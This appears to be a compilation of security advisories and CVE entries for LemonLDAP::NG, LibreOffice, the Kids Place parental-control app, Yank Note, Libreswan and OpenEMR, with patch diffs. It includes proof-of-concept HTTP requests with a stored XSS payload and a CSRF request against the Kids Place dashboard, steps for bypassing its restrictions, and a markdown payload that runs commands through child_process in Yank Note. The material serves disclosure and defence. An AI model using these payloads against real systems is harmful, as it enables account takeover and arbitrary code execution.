In LemonLDAP::NG (aka lemonldap-ng) before 2.0.7, the default Apache HTTP Server configuration does not properly restrict access to SOAP/REST endpoints (when some LemonLDAP::NG setup options are used). For example, an attacker can insert index.fcgi/index.fcgi into a URL to bypass a Require directive.

This release contains some security fixes, including CVE-2019-19791

This new release fixes more than 60 issues. Here are some of bugfixes and improvements of this release:

*   Security:
    *   \[Security: medium, CVE-2019-19791\] Apache access rules and SOAP/REST endpoints
    *   \[Security:medium\] Redirection in OpenID Connect is granted by default if no URI defined in oidcRPMetaDataOptionsRedirectUris
    *   \[Security:low\] afterData plugins (grantSession) cannot prevent session establishment when 2FA is in use
*   Bugs:
    *   Issuer urldc is lost after error in 2F flow or notification flow
    *   Outgoing emails are missing a Date: field
    *   Zimbra preauth not working
    *   REST config service not working
    *   Server Error with OpenID Connect register endpoint
    *   Manager version comparator does not work with minified JS
    *   Reset expired password doesn't trigger when using Combination
    *   Kerberos not working with session upgrade
    *   After temporary ldap failure, ldap connections stop working forever
    *   Authenticating with external OpenID Connect Provider fails because of special chars in user name
*   Improvements:
    *   Possibility to configure new plugins in Manager
    *   Append overScheme for persistent sessions
    *   Allow differents type of managerDN
    *   Append a requiredAuthenticationLevel option for each uri
    *   Add an option to force claims in ID token
    *   Possibility to set attributes and extra claims in OIDC registration endpoints
    *   Specific message and error code for 2F failure
*   New features:
    *   Add per-service macros
    *   New script to convert sessions between backends
    *   Renew Captcha button
    *   Provide refresh tokens in OpenID Connect
    *   Certificate reset by mail
    *   Possibility to view/close other sessions opened for the same user
    *   Create a web service for "refresh my rights"

The full changelog can be seen here: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/milestones/69

**Upgrade notes**: https://lemonldap-ng.org/documentation/latest/upgrade#section207

**Download**: https://lemonldap-ng.org/download

They made this release:

*   Core team: Maxime Besson, Xavier Guimard, Christophe Maudoux and Clément Oudot
*   Organizations : Gendarmerie Nationale, Worteks, CNAMTS, Orange, CSTB, Urgences Santé Québec, FER Genève, Linagora, SITIV, Métropole Européenne de Lille
*   Community (issues opening, tests, patches, pull requests) :  David Coutadeur, Andreas Deschka,  Daniel Berteaud, Grégory Roy, Antoine Rosier, Mickael Bride, Vincent Filali-Ansary, Dave Conroy, Julien Ledoux, Louis Chemineau, Vincent Mazenod, Xavier Bachelot

If you use LemonLDAP::NG and enjoy it, please let us know:

*   https://lemonldap-ng.org/references
*   https://www.openhub.net/p/lemonldap-ng
*   http://alternativeto.net/software/lemonldap-ng/
*   https://comptoir-du-libre.org/softwares/view/101
*   https://framalibre.org/content/lemonldapng
*   http://twitter.com/lemonldapng
*   https://www.facebook.com/lemonldapng/

CVE-2019-19791: OW2 Projects - LemonLDAP::NG 2.0.7 is out! (lemonldap-ng.lemonldap-ng-2-0-7-is-out)

Debian Linux Security Advisory 5415-1 - Two security issues were discovered in LibreOffice, which could potentially result in the execution of arbitrary code when loading a malformed spreadsheet document or unacknowledged loading of linked documents within a floating frame.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5415-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 28, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libreofficeCVE ID         : CVE-2023-0950 CVE-2023-2255Two security issues were discocvered in LibreOffice, which couldpotentially result in the execution of arbitrary code when loading amalformed spreadsheet document or unacknowlegded loading of linkeddocuments within a floating frame.For the stable distribution (bullseye), these problems have been fixed inversion 1:7.0.4-4+deb11u7.We recommend that you upgrade your libreoffice packages.For the detailed security status of libreoffice please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libreofficeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRzchEACgkQEMKTtsN8TjbRrRAAh/7Ahy9I1prBZqnkRKL3JubDmB7+ni9lK1Jmw0wRGVEBFiFOL6wmJXNiHeqXwx/mNv0/PBZGBNsicKAtftv9ixWfWumBKZSWEfPF9wVDwYGBF6xgC8adCcHk4PZ+/DhuNmGoeTJt6FokhkD/AiATR4IhJJLVUwexZV4jMTRyK85JJ4fTkjZnWgk+OkhHMEBMnAIqjWvpS5HapkTuqBvkzNS9+CgZgi03hcSCCdOP4ioGCQt6pHMrpZ0PyOyJukKOR3FO7YMV1U93dcH7wBrMMRilhH6CAXlAVhQz+48A9sXpZN44zYDdEWv6PNrMNhscLXH2bP1JFB2QGh43dMwt+C5VLlWU1BEWHndVE4Juiq5gkBbfCiENXbjSjxt61f1ZxqlMWBGirgePk9p1y0oZj3E0PKgxo8ViCU5ReaRw2LglGzLR+6bgeav52Zk5nJfKQThGKRWbhncXkF0exVtaaJIVw7NGjzPPZqGsIin/XySxBVIljzP1bPi/cW3oW2t81e5uL6ffWM37sM1K0H2E5CQRNvAr0S2L+5AeJa3f1qmzN00pwnmGdLnV/xA0hftn4NWRtdoFbnPTclpyOVH5M3P4D58NY9Hbc+VAQhViWAdt05HnKtKlxU/zq3Sn+qo9IVAtjaD+DiRuhZfXKNaLbP8apQoISsjZnemH0X+HQVM57e-----END PGP SIGNATURE-----

Debian Security Advisory 5415-1

An issue was discovered in the Kiddoware Kids Place Parental Control application before 3.8.50 for Android. The child can remove all restrictions temporarily without the parents noticing by rebooting into Android Safe Mode and disabling the "Display over other apps" permission.

Multiple vulnerabilities have been identified in the Kiddoware Kids Place Parental Control Android App. Users of the parent's web dashboard can be attacked via cross site scripting or cross site request forgery vulnerabilities, or attackers may upload arbitrary files to the children's devices. Furthermore, children are able to bypass any restrictions without the parents noticing.

**Vendor description**

"_Kiddoware is the world’s leading parental control solutions company with a wide range of products and  serving over 5 million families worldwide. Kiddoware is committed in helping you to protect your kids while providing you intelligence to be proactive about your childs’ online activities._"

Source: https://kiddoware.com/

**Business recommendation**

The vendor provides an update for the affected version(s) which should be installed immediately.

An in-depth security analysis performed by security professionals is highly advised, to identify and resolve potential further critical security issues.

The issues identified in this application were part of our blog post "The hidden costs of parental control apps" published a few months ago:  
https://r.sec-consult.com/parents

**Vulnerability overview/description****1) Login and registration returns password as MD5 hash**

Login and registration requests return the unsalted MD5 hash of the password. This indicates that the passwords are stored in an insecure format at the server. Furthermore, MD5 hashing should not be used anymore in modern applications.

**2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)**

The customizable name of the child's device can be used to trigger a XSS payload in the parent web dashboard. Children might be able to attack their parents' account.

**3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)**

All requests in the web dashboard are vulnerable to CSRF attacks. The requests contain the device Id of the child device which must be known to the attacker in order to successfully attack a child. But the device Id is not considered a secret, as it is used in the URL in some requests. An attacker could have obtained the Id through the browser history.

**4) Arbitrary File Upload to AWS S3 bucket**

The web dashboard lets parents send files to the child's device. The selected file is uploaded to an AWS S3 bucket and the returned URL will be transmitted to the device which will then download it. It is possible to send arbitrary files to the child's device and thereby upload arbitrary files (size restriction ~10MB) to the AWS S3 bucket. The returned link is publicly available, so it is possible to use the server to spread malware.

**5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)**

The child can remove all restrictions temporarily without the parents noticing.

**Proof of concept****1) Login and registration returns password as MD5 hash**

The "Change password" request looks as follows:

    POST /account/change_password/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    [...]
    
    old_password=c869123c&new_password=password&confirm_password=password

The response from the web server contains the hashed, unsalted password:

    {
    	"error":null,
    	"result":
    		{
    			"email":"xxxxx@example.com",
    			"hashed_password":"5f4dcc3b5aa765d61d8327deb882cf99",
    			"message":"Password successfully changed!"
    		},
    	"status":200
    } 

Proving this is an unsalted MD5 hash:

    $ echo -n "password" | md5sum -t
    5f4dcc3b5aa765d61d8327deb882cf99  -

**2) Stored XSS via device name in parent Dashboard (CVE-2023-29079) **

The device name can be changed by the child's account by sending a POST request to the API with the pushDeviceConfig method. The following payload can be used as a PoC to trigger an alert box on every page the device name is visible in the parent dashboard. Children/attackers would be able to take over their parents' accounts via this attack.

    POST /v2/api/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Content-Type: application/json; charset=utf-8
    Content-Length: 461
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.12.8
    Connection: close
    
    {
        "method":"pushDeviceConfig",
        "id":null,
        "params":["a28fd8c5-2dcd-11ed-8a7f-0217330f2cf9",
        {
            "isGPSEnabled":false,"deviceGCMRegID":"",
            "deviceUserAgeRange":3,
            "deviceName":"\"><img src=x onerror=\"alert(1)\"/>",
            [...]
        }
    } 

**3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)**

As an example, an attacker can abuse the CSRF vulnerability to download an arbitrary file to a child's device. It is simply needed to create a form which automatically submits on page load. If a parent is logged in the web dashboard and visits  this malicious site, the authenticated request will be sent and the file specified in the URL parameter will be downloaded by the child's device.

    POST /account/push_content/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https:// kidsplace.kiddoware.com
    Content-Length: 75
    Connection: close
    
    url=https%3A%2F%2Fgoogle.de%2Findex.html&message=&deviceID=XXXXXXX  

**4) Arbitrary File Upload to AWS S3 bucket**

The web dashboard lets parents upload arbitrary files to the Kiddoware AWS S3 bucket and push it to the child device.

    POST /account/push_content_file/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Content-Type: multipart/form-data; boundary=---------------------------27687116714103572458683268551
    Origin: https:// kidsplace.kiddoware.com
    Content-Length: 296
    [...]
    
    -----------------------------27687116714103572458683268551
    Content-Disposition: form-data; name="push_file"; filename="eicar.com.txt"
    Content-Type: text/plain
    
    <eicar-file>
    -----------------------------27687116714103572458683268551--

The upload of the eicar file worked without errors and could subsequently also be downloaded  via the returned link. So there is no antivirus scan on the uploaded files.

**5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)**

The child can disable the restrictions of the application without the parents noticing.  
For this, the following steps are necessary:  
a) If Android settings are blocked, reboot into Android Safe Mode.  
b) Disable "Display over other apps" Permission for the app in Android settings.  
c) After rebooting into normal mode, the child device can be used without restrictions. 

For example, previously locked apps can now be used. To notice the problem, the parent has to check the parent's dashboard manually, a notification is not sent. If the child turns the permission back on in the meantime, the bypass will go unnoticed.

**Vulnerable / tested versions**

The following version has been tested and downloaded through Google Play store, which was the most recent version available at the time of the test:

*   3.8.45

Later on, version 3.8.49 (2022-10-25) has been verified to be vulnerable as well.

**Vendor contact timeline**

CVE-2023-28153: Multiple Vulnerabilities in Kiddoware Kids Place Parental Control Android App

Yank Note (YN) 3.52.1 allows execution of arbitrary code when a crafted file is opened, e.g., via nodeRequire('child_process').

    # Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution# Date: 2023-04-27# Exploit Author: 8bitsec# CVE: CVE-2023-31874# Vendor Homepage: yank-note.com# Software Link: https://github.com/purocean/yn# Version: 3.52.1# Tested on: [Ubuntu 22.04 | Mac OS 13]Release Date: 2023-04-27Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacementTechnical Details & Description:A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.Proof of Concept (PoC):Arbitrary code execution:Create a markdown file (.md) in any text editor and write the following payload.Mac:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">Ubuntu:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">Opening the file in Yank Note will auto execute the Calculator application.

CVE-2023-31874: Yank Note 3.52.1 Arbitrary Code Execution ≈ Packet Storm

pluto in Libreswan before 4.11 allows a denial of service (responder SPI mishandling and daemon crash) via unauthenticated IKEv1 Aggressive Mode packets. The earliest affected version is 3.28.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Release date: Wednesday, May 3, 2023 Contact: security@libreswan.org PGP key: 907E790F25C1E8E561CD73B585FF4B43B30FC6F9 =========================================================================== CVE-2023-30570: Malicious IKEv1 Aggressive Mode packets can crash libreswan =========================================================================== This alert (and any updates) are available at the following URLs: https://libreswan.org/security/CVE-2023-30570/ The Libreswan Project was notified by github user "XU-huai" of an issue with receiving a malformed IKEv1 Aggressive Mode packet that would cause a crash and restart of the libreswan pluto daemon. When sent continuously, this could lead to a denial of service attack. Vulnerable versions : libreswan 3.28 - 4.10 Not vulnerable : libreswan 3.0 - 3.27, 4.11+ Vulnerability information ========================= When an IKEv1 Aggressive Mode packet is received with only unacceptable crypto algorithms, the response packet is not sent with a zero responder SPI. When a subsequent packet is received where the sender re-uses the libreswan responder SPI, the pluto daemon state machine crashes. No remote code execution is possible. Exploitation ============ This vulnerability requires that pluto is configured with at least one potentially matching IKEv1 Aggressive Mode connection. Per default, pluto only accepts IKEv2 packets. When IKEv1 is enabled, only Main Mode packets are accepted unless the connection is configured explicitely with aggressive=yes or via its older name aggrmode=yes. When an IKEv1 Aggressive Mode connection is enabled, a malicious peer needs to send an IKEv1 Aggressive Mode packet with an unsupported algorithm, such as DH2. Then the malicious peer needs to be able to receive the reply so it can resend the packet with the received responder SPI added to cause the libreswan pluto daemon to crash and restart. The vulnerable code has been in the code base since 2003 (then still named "openswan") but only became reachable since an IKEv1 Aggressive Mode change that was introduced in libreswan 3.28. Workaround ========== IKEv1 Aggressive Mode connections could be converted to IKEv2 or IKEv1 Main Mode connections. If this is not feasable, patching or upgrading is the only other alternative. History ======= \* 2003 Vulnerable code introduced in openswan-1.0.0 but unreachable \* 2022-04-25 IKEv1 Aggresive Mode change caused vulnerable code to be reachable \* 2023-03-16 Initial report via https://github.com/libreswan/libreswan/issues/1039 \* 2023-04-16 Prerelease of CVE notification and patches to support customers \* 2023-05-03 Release of patch and libreswan 4.11 Credits ======= This vulnerability was found and reported by github user XU-huai Upgrading ========= To address this vulnerability, please upgrade to libreswan 4.11 or later. For those who cannot upgrade, patches are provided at the above URL. About libreswan (https://libreswan.org/) ======================================== Libreswan is a free implementation of the Internet Key Exchange (IKE) protocols IKEv1 and IKEv2. It is a descendant (continuation fork) of openswan 2.6.38. IKE is used to establish IPsec VPN connections. IPsec uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks. Everything passing through the untrusted network is encrypted by the IPsec gateway machine, and decrypted by the gateway at the other end of the tunnel. The resulting tunnel is a virtual private network (VPN). Patches ======= Due to the size of the patch, it is not included inline to this advisory. -----BEGIN PGP SIGNATURE----- iQJHBAEBCgAxFiEEkH55DyXB6OVhzXO1hf9LQ7MPxvkFAmRSzNYTHHRlYW1AbGli cmVzd2FuLm9yZwAKCRCF/0tDsw/G+Z88D/9YuPoEvk7cMrSN7jV0z9liNiAR/gYB gj8CjXkIw4mNaQIcpvhArlFMYov0MXh+nOJDiALx6/dsb6nvgzg/vvVOSU5jSRtg cEC8STA/rvLRSlj5mChKNAayVUmSgOxSg4AFr6zvG+/iQzC3vT2mlmwLXVKw5F+n Nn00Ov1EklqCRlSBUYhuKY2zyhRfxPajZW9s8VcKiUs36qzTjjp/EsUTln3uNHk4 nFIL+6cxEkUIVKtfZVpoB/zLg73tsnUEAdKeXl0H3BqLLohrbkPNEYh7HZsxrD1v g8Z/omf41wfN9p/JJkMK84qN55Nis90TiU5esf4gnl0vOf1dH4vMd7a082ee07UC wPeDL2zpxviIGdnFFzXOnlj88Xa7FsAcB7XU5wcpQcN9GFn8YbiSQvRbKFrrmpNf 10JXYPbMTze8QdrXI4E6mXGbgs9i4BxqYNrSFv0Xuyth+LSAL499adH+SZcG0kc2 XiQ1ZmGqBtQg68CPUdhuP1C4mixwTZ6wJQOyZlagebTDgJVPx52aSYAqoeakTzJ5 YpnVsYBbZXRZTvRasR9sdLp6ZiIzmIy3TF40GwoKvVWKburAaLp53FW2/s5Tvb5G BzlFcusnGd4xteUQklfOow4NJZZxUlEljQgu+yKZaNziYngaFwsy/shfM3STNlth 1mSorpVmVanqiw== =DgY+ -----END PGP SIGNATURE-----

CVE-2023-30570

Improper Authorization in GitHub repository openemr/openemr prior to 7.0.1.

Expand Up @@ -251,11 +251,12 @@ public function Create() $onsitedocument\->Pid = $this\->SafeGetVal($json, 'pid'); }  
if (!empty($\_SESSION\["patient\_portal\_onsite\_two"\] ?? null)) { // removing for testing /\* if (!empty($\_SESSION\["patient\_portal\_onsite\_two"\] ?? null)) { $decode = $this->SafeGetVal($json, 'fullDocument'); $k = (int)$this->SafeGetVal($json, 'csrf\_token\_form')\[0\]; $json->fullDocument = $this->decode($decode, $k); } } \*/  
$onsitedocument\->Facility = $this\->SafeGetVal($json, 'facility'); $onsitedocument\->Provider = $this\->SafeGetVal($json, 'provider'); Expand All @@ -281,6 +282,12 @@ public function Create() if (count($errors) > 0) { $this\->RenderErrorJSON('Please check the form for errors', $errors); } else { $new\_data = $onsitedocument\->FullDocument; // use a custom diff function to look for changing tags only with html if ($new\_data != strip\_tags($new\_data)) { $old\_data = $json\->fullDocument; $onsitedocument\->FullDocument = $this\->htmlDiff($old\_data, $new\_data); } $onsitedocument\->Save(); $this\->RenderJSON($onsitedocument, $this\->JSONPCallback(), true, $this\->SimpleObjectParams()); } Expand All @@ -302,6 +309,7 @@ public function Update() } $pk = $this\->GetRouter()->GetUrlParam('id'); $onsitedocument = $this\->Phreezer\->Get('OnsiteDocument', $pk); $old\_data = $onsitedocument\->FullDocument;  
// only allow patient to update themselves (part 1) if (!empty($GLOBALS\['bootstrap\_pid'\])) { Expand All @@ -318,11 +326,12 @@ public function Update() $onsitedocument\->Pid = $this\->SafeGetVal($json, 'pid', $onsitedocument\->Pid); }  
if (!empty($\_SESSION\["patient\_portal\_onsite\_two"\] ?? null)) { // removing for testing /\* if (!empty($\_SESSION\["patient\_portal\_onsite\_two"\] ?? null)) { $decode = $this->SafeGetVal($json, 'fullDocument'); $k = (int)$this->SafeGetVal($json, 'csrf\_token\_form')\[0\]; $json->fullDocument = $this->decode($decode, $k); } } \*/  
$onsitedocument\->Facility = $this\->SafeGetVal($json, 'facility', $onsitedocument\->Facility); $onsitedocument\->Provider = $this\->SafeGetVal($json, 'provider', $onsitedocument\->Provider); Expand All @@ -348,6 +357,11 @@ public function Update() if (count($errors) > 0) { $this\->RenderErrorJSON('Please check the form for errors', $errors); } else { // use a custom diff function to look for changing tags only with html $new\_data = $onsitedocument\->FullDocument; if ($new\_data != strip\_tags($new\_data)) { $onsitedocument\->FullDocument = $this\->htmlDiff($old\_data, $new\_data); } $onsitedocument\->Save(); $this\->RenderJSON($onsitedocument, $this\->JSONPCallback(), true, $this\->SimpleObjectParams()); } Expand Down Expand Up @@ -385,11 +399,12 @@ public function Delete() } }  
/\*\* // removing for testing /\* \* @param $encoded \* @param $v \* @return bool|string \*/ private function decode($encoded, $v): bool|string { $encoded = base64\_decode($encoded); Expand All @@ -401,4 +416,45 @@ private function decode($encoded, $v): bool|string } return base64\_decode(base64\_decode($decoded)); } \*/  
private function diff($old, $new): array { $matrix = array(); $maxlen = 0; foreach ($old as $oindex => $ovalue) { $nkeys = array\_keys($new, $ovalue); foreach ($nkeys as $nindex) { $matrix\[$oindex\]\[$nindex\] = isset($matrix\[$oindex - 1\]\[$nindex - 1\]) ? $matrix\[$oindex - 1\]\[$nindex - 1\] + 1 : 1; if ($matrix\[$oindex\]\[$nindex\] > $maxlen) { $maxlen = $matrix\[$oindex\]\[$nindex\]; $omax = $oindex + 1 - $maxlen; $nmax = $nindex + 1 - $maxlen; } } } if ($maxlen == 0) { return array(array('d' => $old, 'i' => $new)); } return array\_merge( $this\->diff(array\_slice($old, 0, $omax), array\_slice($new, 0, $nmax)), array\_slice($new, $nmax, $maxlen), $this\->diff(array\_slice($old, $omax + $maxlen), array\_slice($new, $nmax + $maxlen)) ); }  
private function htmlDiff($old, $new): string { $ret = ''; $diff = $this\->diff(preg\_split("/\[\\s\]+/", $old), preg\_split("/\[\\s\]+/", $new)); foreach ($diff as $k) { if (is\_array($k)) { $ret .= (!empty($k\['i'\]) ? attr(implode(' ', $k\['i'\])) : ''); } else { $ret .= $k . ' '; } } return $ret; } }

CVE-2023-2950: fix: bug fix (#6354) · openemr/openemr@abee8d2

Cross-site Scripting (XSS) - Generic in GitHub repository openemr/openemr prior to 7.0.1.

Expand Up

@@ -55,7 +55,7 @@ function add\_template(){

url: "ajax\_code.php",

dataType: "html",

data: {

list\_id: <?php echo htmlspecialchars($list\_id, ENT\_QUOTES);?>,

list\_id: <?php echo js\_escape($list\_id); ?>,

multi: val,

source: "save\_provider"

},

Expand All

@@ -71,7 +71,7 @@ function add\_template(){

return;

}

else{

alert("<?php echo addslashes(xl('You should select at least one Provider'));?>");

alert(<?php echo xlj('You should select at least one Provider');?>);

}

  

}

Expand All

@@ -97,13 +97,13 @@ function add\_template(){

$sel = '';

}

}

echo "<option value='" . htmlspecialchars($row\['id'\], ENT\_QUOTES) . "' $sel\>" . htmlspecialchars($row\['lname'\] . "," . $row\['fname'\], ENT\_QUOTES) . "</option>";

echo "<option value='" . attr($row\['id'\]) . "' $sel\>" . text($row\['lname'\] . "," . $row\['fname'\]) . "</option>";

}

?>

</select\>

</td\>

<td\>

<a href\="#" onclick\="add\_template()" class\="btn btn-primary"\><span\><?php echo htmlspecialchars(xl('Save'), ENT\_QUOTES);?></span\></a\>

<a href\="#" onclick\="add\_template()" class\="btn btn-primary"\><span\><?php echo xlt('Save');?></span\></a\>

</td\>

</tr\>

</table\>

Expand Down

CVE-2023-2948: fixes: couple more misc fixes (#6336) · openemr/openemr@af1ecf7

 Code Injection in GitHub repository openemr/openemr prior to 7.0.1.

Expand Up @@ -43,7 +43,7 @@ require\_once("$srcdir/forms.inc.php"); require\_once("$srcdir/appointments.inc.php");  
use OpenEMR\\Core\\Header; use OpenEMR\\Services\\AppointmentService;  
// Things that might be passed by our opener. // Expand All @@ -64,6 +64,24 @@ exit(); }  
if (!empty($\_POST\['form\_pid'\])) { if ($\_POST\['form\_pid'\] != $\_SESSION\['pid'\]) { echo js\_escape("error"); exit(); }  
if (! getAvailableSlots($\_POST\['form\_date'\], date('Y-m-d', strtotime("+1 year " . $\_POST\['form\_date'\])), $\_POST\['form\_provider\_ae'\])) { echo js\_escape("error"); exit(); }  
$appointment\_service = (new AppointmentService())->getOneCalendarCategory($\_POST\['form\_category'\]); if (($\_POST\['form\_duration'\] \* 60) != ($appointment\_service\[0\]\['pc\_duration'\])) { echo js\_escape("error"); exit(); } }  
if ($date) { $date = substr($date, 0, 4) . '-' . substr($date, 4, 2) . '-' . substr($date, 6); } else { Expand Down Expand Up @@ -135,7 +153,7 @@ $event\_date = fixDate($\_POST\['form\_date'\]);  
// Compute start and end time strings to be saved. if ($\_POST\['form\_allday'\]) { if ($\_POST\['form\_allday'\] ?? null) { $tmph = 0; $tmpm = 0; $duration = 24 \* 60; Expand Down Expand Up @@ -165,7 +183,7 @@  
// More garbage, but this time 1 character of it is used to save the // repeat type. if ($\_POST\['form\_repeat'\]) { if ($\_POST\['form\_repeat'\] ?? null) { $recurrspec = 'a:5:{' . 's:17:"event\_repeat\_freq";s:1:"' . $\_POST\['form\_repeat\_freq'\] . '";' . 's:22:"event\_repeat\_freq\_type";s:1:"' . $\_POST\['form\_repeat\_type'\] . '";' . Expand All @@ -185,7 +203,7 @@ //for example monday, or thursday. We set the start date on the first day of the week //that the event is scheduled. For example if you set the event to repeat on each monday //the start date of the event will be set on the first monday after the day the event is scheduled if ($\_POST\['form\_repeat\_type'\] == 5) { if (($\_POST\['form\_repeat\_type'\] ?? null) == 5) { $exploded\_date = explode("\-", $event\_date); $edate = date("D", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\], $exploded\_date\[0\])); if ($edate == "Tue") { Expand All @@ -201,7 +219,7 @@ } elseif ($edate == "Sun") { $event\_date = date("Y-m-d", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\] + 1, $exploded\_date\[0\])); } } elseif ($\_POST\['form\_repeat\_type'\] == 6) { } elseif (($\_POST\['form\_repeat\_type'\] ?? null) == 6) { $exploded\_date = explode("\-", $event\_date); $edate = date("D", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\], $exploded\_date\[0\])); if ($edate == "Wed") { Expand All @@ -217,7 +235,7 @@ } elseif ($edate == "Mon") { $event\_date = date("Y-m-d", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\] + 1, $exploded\_date\[0\])); } } elseif ($\_POST\['form\_repeat\_type'\] == 7) { } elseif (($\_POST\['form\_repeat\_type'\] ?? null) == 7) { $exploded\_date = explode("\-", $event\_date); $edate = date("D", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\], $exploded\_date\[0\])); if ($edate == "Thu") { Expand All @@ -233,7 +251,7 @@ } elseif ($edate == "Tue") { $event\_date = date("Y-m-d", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\] + 1, $exploded\_date\[0\])); } } elseif ($\_POST\['form\_repeat\_type'\] == 8) { } elseif (($\_POST\['form\_repeat\_type'\] ?? null) == 8) { $exploded\_date = explode("\-", $event\_date); $edate = date("D", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\], $exploded\_date\[0\])); if ($edate == "Fri") { Expand All @@ -249,7 +267,7 @@ } elseif ($edate == "Wed") { $event\_date = date("Y-m-d", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\] + 1, $exploded\_date\[0\])); } } elseif ($\_POST\['form\_repeat\_type'\] == 9) { } elseif (($\_POST\['form\_repeat\_type'\] ?? null) == 9) { $exploded\_date = explode("\-", $event\_date); $edate = date("D", mktime(0, 0, 0, $exploded\_date\[1\], $exploded\_date\[2\], $exploded\_date\[0\])); if ($edate == "Sat") { Expand Down Expand Up @@ -305,7 +323,7 @@ "'" . add\_escape\_custom($\_POST\['form\_category'\]) . "', " . "'" . add\_escape\_custom($row\['pc\_multiple'\]) . "', " . "'" . add\_escape\_custom($to\_be\_inserted) . "', " . "'" . add\_escape\_custom($\_POST\['form\_pid'\]) . "', " . "'" . add\_escape\_custom($\_SESSION\['pid'\]) . "', " . "'" . add\_escape\_custom($\_POST\['form\_title'\]) . "', " . "NOW(), " . "'" . add\_escape\_custom($\_POST\['form\_comments'\]) . "', " . Expand All @@ -332,7 +350,7 @@ foreach ($\_POST\['form\_provider\_ae'\] as $provider) { sqlStatement("UPDATE openemr\_postcalendar\_events SET " . "pc\_catid = '" . add\_escape\_custom($\_POST\['form\_category'\]) . "', " . "pc\_pid = '" . add\_escape\_custom($\_POST\['form\_pid'\]) . "', " . "pc\_pid = '" . add\_escape\_custom($\_SESSION\['pid'\]) . "', " . "pc\_title = '" . add\_escape\_custom($\_POST\['form\_title'\]) . "', " . "pc\_time = NOW(), " . "pc\_hometext = '" . add\_escape\_custom($\_POST\['form\_comments'\]) . "', " . Expand Down Expand Up @@ -365,22 +383,22 @@ sqlStatement("UPDATE openemr\_postcalendar\_events SET " . "pc\_catid = '" . add\_escape\_custom($\_POST\['form\_category'\]) . "', " . "pc\_aid = '" . add\_escape\_custom($prov) . "', " . "pc\_pid = '" . add\_escape\_custom($\_POST\['form\_pid'\]) . "', " . "pc\_pid = '" . add\_escape\_custom($\_SESSION\['pid'\]) . "', " . "pc\_title = '" . add\_escape\_custom($\_POST\['form\_title'\]) . "', " . "pc\_time = NOW(), " . "pc\_hometext = '" . add\_escape\_custom($\_POST\['form\_comments'\]) . "', " . "pc\_informant = '" . add\_escape\_custom($\_SESSION\['providerId'\]) . "', " . "pc\_eventDate = '" . add\_escape\_custom($event\_date) . "', " . "pc\_endDate = '" . add\_escape\_custom(fixDate($\_POST\['form\_enddate'\])) . "', " . "pc\_endDate = '" . add\_escape\_custom(fixDate($\_POST\['form\_enddate'\] ?? '')) . "', " . "pc\_duration = '" . add\_escape\_custom(($duration \* 60)) . "', " . "pc\_recurrtype = '" . ($\_POST\['form\_repeat'\] ? '1' : '0') . "', " . "pc\_recurrtype = '" . (($\_POST\['form\_repeat'\] ?? null) ? '1' : '0') . "', " . "pc\_recurrspec = '" . add\_escape\_custom($recurrspec) . "', " . "pc\_startTime = '" . add\_escape\_custom($starttime) . "', " . "pc\_endTime = '" . add\_escape\_custom($endtime) . "', " . "pc\_alldayevent = '" . add\_escape\_custom($\_POST\['form\_allday'\]) . "', " . "pc\_alldayevent = '" . add\_escape\_custom(($\_POST\['form\_allday'\] ?? '')) . "', " . "pc\_apptstatus = '" . add\_escape\_custom($\_POST\['form\_apptstatus'\]) . "', " . "pc\_prefcatid = '" . add\_escape\_custom($\_POST\['form\_prefcat'\]) . "', " . "pc\_facility = '" . (int)$\_POST\['facility'\] . "' " . // FF stuff "pc\_prefcatid = '" . add\_escape\_custom(($\_POST\['form\_prefcat'\] ?? '')) . "', " . "pc\_facility = '" . (int)($\_POST\['facility'\] ?? null) . "' " . // FF stuff "WHERE pc\_eid = '" . add\_escape\_custom($eid) . "'"); }  
